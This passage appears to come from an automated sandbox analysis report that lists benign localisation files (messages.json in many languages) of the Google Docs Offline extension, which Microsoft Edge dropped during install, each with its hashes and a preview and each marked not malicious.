                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):994
                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):936
                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):914
                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):851
                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):878
                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):978
                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):907
                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):914
                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):937
                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
